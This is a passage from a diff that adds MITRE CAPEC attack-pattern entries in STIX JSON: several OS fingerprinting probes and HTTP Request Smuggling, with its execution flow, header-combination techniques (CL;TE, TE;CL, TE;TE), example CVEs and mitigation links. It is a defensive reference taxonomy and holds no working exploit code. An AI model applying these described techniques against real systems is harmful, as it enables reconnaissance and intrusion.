"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + 
] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe checks the initial TCP Window size. TCP stacks limit the range of sequence numbers allowable within a session to maintain the \"connected\" state within TCP protocol logic. The initial window size specifies a range of acceptable sequence numbers that will qualify as a response to an ACK packet within a session. Various operating systems use different Initial window sizes. 
The initial window size can be sampled by establishing an ordinary TCP connection.", + "external_references": [ + { + "external_id": "CAPEC-326", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/326.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--c4dd22c6-ad54-47c8-b0ab-d7f3cad9e026", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Initial Window Size Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + 
"x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe analyzes the type and order of any TCP header options present within a response segment. Most operating systems use unique ordering and different option sets when options are present. RFC 793 does not specify a required order when options are present, so different implementations use unique ways of ordering or structuring TCP options. TCP options can be generated by ordinary TCP traffic.", + "external_references": [ + { + "external_id": "CAPEC-327", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project 
Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--c0ad20d0-8b30-460c-a060-da46582bdbec", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Options Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe performs a checksum on any ASCII data contained within the data portion or a RST packet. Some operating systems will report a human-readable text message in the payload of a 'RST' (reset) packet when specific types of connection errors occur. 
RFC 1122 allows text payloads within reset packets but not all operating systems or routers implement this functionality.", + "external_references": [ + { + "external_id": "CAPEC-328", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2d865521-82f5-42e5-a595-dc93f60dfd3f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP 'RST' Flag Checksum Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + 
"x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the amount of data returned or \"Quoted\" from the originating request that generated the ICMP error message.", + "external_references": [ + { + "external_id": "CAPEC-329", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/329.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. 
Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247", + "modified": "2022-02-22T00:00:00.000Z", + "name": "ICMP Error Message Quoting Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. The goal of this analysis to make inferences about the type of operating system or firmware that sent the error message in reply.\n This is useful for identifying unique characteristics of operating systems because the RFC-1122 expected behavior reads: \"Every ICMP error message includes the Internet header and at least the first 8 data octets of the datagram that triggered the error; more than 8 octets MAY be sent [...].\" This contrasts with RFC-792 expected behavior, which limited the quoted text to 64 bits (8 octets). 
Given the latitude in the specification the resulting RFC-1122 stack implementations often respond with a high degree of variability in the amount of data quoted in the error message because \"older\" or \"legacy\" stacks may comply with the RFC-792 specification, while other stacks may choose a longer format in accordance with RFC-1122. As a general rule most operating systems or firmware will quote the first 8 bytes of the datagram triggering the error, but some IP stacks will quote more than the first 8 bytes of data.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages using various HTTP headers, request-line and body parameters as well as message sizes (denoted by the end of message signaled by a given HTTP header) by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) 
to secretly send unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).\n See CanPrecede relationships for possible consequences.\n ", + "external_references": [ + { + "external_id": "CAPEC-33", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/33.html" + }, + { + "external_id": "CWE-444", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/444.html" + }, + { + "description": "HTTP Request Smuggling", + "external_id": "26", + "source_name": "WASC", + "url": "http://projects.webappsec.org/HTTP-Request-Smuggling" + }, + { + "description": "HTTP 1.1 Specification (RFC 2616), IETF RFC", + "external_id": "REF-38", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc2616.txt" + }, + { + "description": "HTTP Response Smuggling, Beyond Security", + "external_id": "REF-117", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securityreviews/5CP0L0AHPC.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-617", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html" + }, + { + "description": "Robert Auger, HTTP Request Smuggling, 2010--01, The Web Application Security Consortium", + "external_id": "REF-672", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246928/HTTP%20Request%20Smuggling" + }, + { + "description": "Dzevad Alibegovic, HTTP Request Smuggling: Complete Guide to Attack Types and Prevention, 2021--08---23, NeuraLegion", + "external_id": "REF-673", + "source_name": "reference_from_CAPEC", + "url": "https://www.neuralegion.com/blog/http-request-smuggling-hrs/" + }, + { + "description": "Busra Demir, A Pentester’s Guide to HTTP Request Smuggling, 
2020--10---15, Cobalt", + "external_id": "REF-674", + "source_name": "reference_from_CAPEC", + "url": "https://cobalt.io/blog/a-pentesters-guide-to-http-request-smuggling" + }, + { + "description": "Edi Kogan, Daniel Kerman, HTTP Desync Attacks in the Wild and How to Defend Against Them, 2019--10---29, Imperva", + "external_id": "REF-678", + "source_name": "reference_from_CAPEC", + "url": "https://www.imperva.com/blog/http-desync-attacks-and-defence-methods/" + }, + { + "description": "James Kettle, HTTP Desync Attacks: Request Smuggling Reborn, 2019--08---07, PortSwigger", + "external_id": "REF-681", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn" + }, + { + "description": "HTTP request smuggling, PortSwigger", + "external_id": "REF-682", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/request-smuggling" + }, + { + "description": "Finding HTTP request smuggling vulnerabilities, PortSwigger", + "external_id": "REF-683", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/request-smuggling/finding" + }, + { + "description": "Exploiting HTTP request smuggling vulnerabilities, PortSwigger", + "external_id": "REF-684", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/request-smuggling/exploiting" + } + ], + "id": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP Request Smuggling", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "HTTP Desync" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + 
"attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n When using Haproxy 1.5.3 version as front-end proxy server with with Node.js version 14.13.1 or 12.19.0 as the back-end web server it is possible to use two same header fields for example: two Transfer-Encoding, Transfer-Encoding: chunked and Transfer-Encoding: chunked-false, to bypass Haproxy /flag URI restriction and receive the Haproxy flag value, since Node.js identifies the first header but ignores the second header. See also: CVE-2020-8287\n ", + "\n When using Sun Java System Web Proxy Server 3.x or 4.x in conjunction with Sun ONE/iPlanet 6.x, Sun Java System Application Server 7.x or 8.x, it is possible to bypass certain application firewall protections, hijack web sessions, perform Cross Site Scripting or poison the web proxy cache using HTTP Request Smuggling. Differences in the way HTTP requests are parsed by the Proxy Server and the Application Server enable malicious requests to be smuggled through to the Application Server, thereby exposing the Application Server to aforementioned attacks. See also: CVE-2006-6276\n ", + "\n Apache server 2.0.45 and version before 1.3.34, when used as a proxy, easily lead to web cache poisoning and bypassing of application firewall restrictions because of non-standard HTTP behavior. 
Although the HTTP/1.1 specification clearly states that a request with both \"Content-Length\" and a \"Transfer-Encoding: chunked\" headers is invalid, vulnerable versions of Apache accept such requests and reassemble the ones with \"Transfer-Encoding: chunked\" header without replacing the existing \"Content-Length\" header or adding its own. This leads to HTTP Request Smuggling using a request with a chunked body and a header with \"Content-Length: 0\". See also: CVE-2005-2088\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.

  2. Techniques
    Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

  1. Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, message sizes, and HTTP headers.

  2. Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP requests to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

  3. Techniques
    Continue the monitoring of HTTP traffic.
    \n Utilize various combinations of HTTP Headers within a single HTTP Request such as: Content-Length & Transfer-Encoding (CL;TE), Transfer-Encoding & Content-Length (TE;CL), or double Transfer-Encoding (TE;TE), so that additional embedded requests or data in the body of the original request are unprocessed and treated as part of subsequent requests by the intended target HTTP agent.\n From these HTTP Header combinations the adversary observes any timing delays (usually in the form of HTTP 404 Error response) or any other unintended consequences.\n \n For CL;TE and TE;CL HTTP header combinations, the first HTTP agent, in the HTTP message path that receives the HTTP request, takes precedence or only processes one header but not the other, while the second/final HTTP agent processes the opposite header, allowing for embedded HTTP requests to be ignored and smuggled to the intended target HTTP agent.\n For TE;TE HTTP headers combination, all HTTP agents in HTTP message path process Transfer-Encoding header, however, adversary obfuscation (see Mitigations for details) of one of the Transfer-Encoding headers, by not adhering strictly to the protocol specification, can cause it to be unprocessed/ignored by a designated HTTP agent, hence allowing embedded HTTP requests to be smuggled. .\n \n
    \n Construct a very large HTTP request using multiple Content-Length headers of various data lengths that can potentially cause subsequent requests to be ignored by an intermediary HTTP agent (firewall) and/or eventually parsed separately by the target HTTP agent (web server).\n Note that most modern HTTP infrastructure reject HTTP requests with multiple Content-Length headers.\n
    Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

  1. Perform HTTP Request Smuggling attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.

  2. Techniques
    Leverage techniques identified in the Experiment Phase.
", + "x_capec_extended_description": "\n A maliciously crafted HTTP request, which contains a second secretly embedded HTTP request is interpreted by an intermediary web proxy as single benign HTTP request, is forwarded to a back-end server, that interprets and parses the HTTP request as two authorized benign HTTP requests bypassing security controls.\n This attack usually involves the misuse of the HTTP headers: Content-Length and Transfer-Encoding. These abuses are discussed in RFC 2616 #4.4.3 and section #4.2 and are related to ordering and precedence of these headers. [REF-38]\n Additionally this attack can be performed through modification and/or fuzzing of parameters composing the request-line of HTTP messages.\n This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions in the HTTP agents.\n This differs from CAPEC-273 HTTP Response Smuggling, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. 
HTTP Request Smuggling is an attempt to compromise aback-end HTTP agentvia HTTP Request messages.\n HTTP Splitting (CAPEC-105 and CAPEC-34) is different from HTTP Smuggling due to the fact that during implementation of asynchronous requests, HTTP Splitting requires the embedding/injection of arbitrary HTML headers and content through user input into browser cookies or Ajax web/browser object parameters like XMLHttpRequest.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_peer_of_refs": [ + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974" + ], + "x_capec_prerequisites": [ + "An additional intermediary HTTP agent such as an application firewall or a web caching proxy between the adversary and the second agent such as a web server, that sends multiple HTTP messages over same network connection.", + "Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.", + "HTTP agents running on HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses." + ], + "x_capec_resources_required": [ + "Tools capable of crafting malicious HTTP messages and monitoring HTTP message responses." + ], + "x_capec_skills_required": { + "Medium": "Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6100503-6f80-4635-b9dd-c9d1788158b5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad42c576-3139-4cee-ab82-749f0c506f57", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd575ece-d038-4eb4-82d2-cc0b2717655b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--77b0b8cc-d674-4ba6-979e-cae5adc89a5c", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5aa2cd65-f8bc-45da-a757-06ea485a0d3e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d84e072-1001-4113-b462-004ab68ea8da", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8ea59df1-f9e8-49e5-9fb1-39d689fd42cd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc7176bc-62c9-4fad-9036-5f5079477a3a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78d6512c-86fb-4c96-b8f0-bebd67b26ece", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9475a8b1-13bc-4b75-b6b8-af4040ec7469", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4ec4cb3d-85a3-4f13-b540-d74a0a2024e1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8357749-6d25-4561-9c20-f8f937fb10f0", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--82300401-dfdb-4a55-b612-2e17989ee4ec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + 
